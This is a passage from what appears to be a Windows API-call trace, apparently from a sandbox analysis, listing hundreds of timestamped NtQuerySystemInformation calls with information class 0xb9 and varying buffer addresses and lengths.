NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation 